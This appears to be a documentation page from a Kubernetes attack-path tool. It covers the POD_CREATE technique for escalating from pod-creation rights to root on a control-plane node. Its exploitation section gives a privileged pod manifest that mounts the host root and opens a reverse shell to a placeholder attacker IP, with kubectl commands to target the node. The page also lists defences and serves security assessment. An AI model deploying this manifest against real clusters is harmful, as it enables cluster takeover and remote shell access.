Skip to content

POD_CREATE

Create a pod with significant privilege (CAP_SYSADMIN, hostPath=/, etc) and schedule on a target node via setting the nodeName selector.

Source Destination MITRE ATT&CK
PermissionSet Node Deploy Container, T1610

Details

Given the rights to create a new pod, an attacker can create a deliberately overprivileged pod within the cluster. This will grant the attacker full control over the node on which the pod is scheduled (via any number of container escape techniques). Additionally by setting the nodeName selector in the pod spec to the control plane node, the attacker can gain root access to the control plane node and take over the entire cluster!

Prerequisites

A role granting permission to create pods.

Checks

Check whether the current account has the ability to create pods, for example using kubectl:

kubectl auth can-i create pod

Exploitation

Identify the name of the target (e.g control plane) node via:

kubectl get nodes -o wide --all-namespaces | grep control-plane

Create a pod spec for our attack pod (N.B. If your target node is a control plane one you may need to add a toleration to this manifest to allow it to be scheduled):

apiVersion: v1
kind: Pod
metadata:
  name: control-plane-attack
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: control-plane-attack
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1" ]
  nodeName: < TARGET NODE NAME > 
  volumes:
  - name: noderoot
    hostPath:
      path: /

Create the pod via kubectl:

kubebctl apply -f control-plane-pod-spec.yaml

Defences

Monitoring

  • Monitor for pod creation from within an existing pod
  • Monitor privileged pod creation with suspicious command arguments

Implement security policies

Use a pod security policy or admission controller to prevent or limit the creation of pods with additional powerful capabilities.

Calculation

References: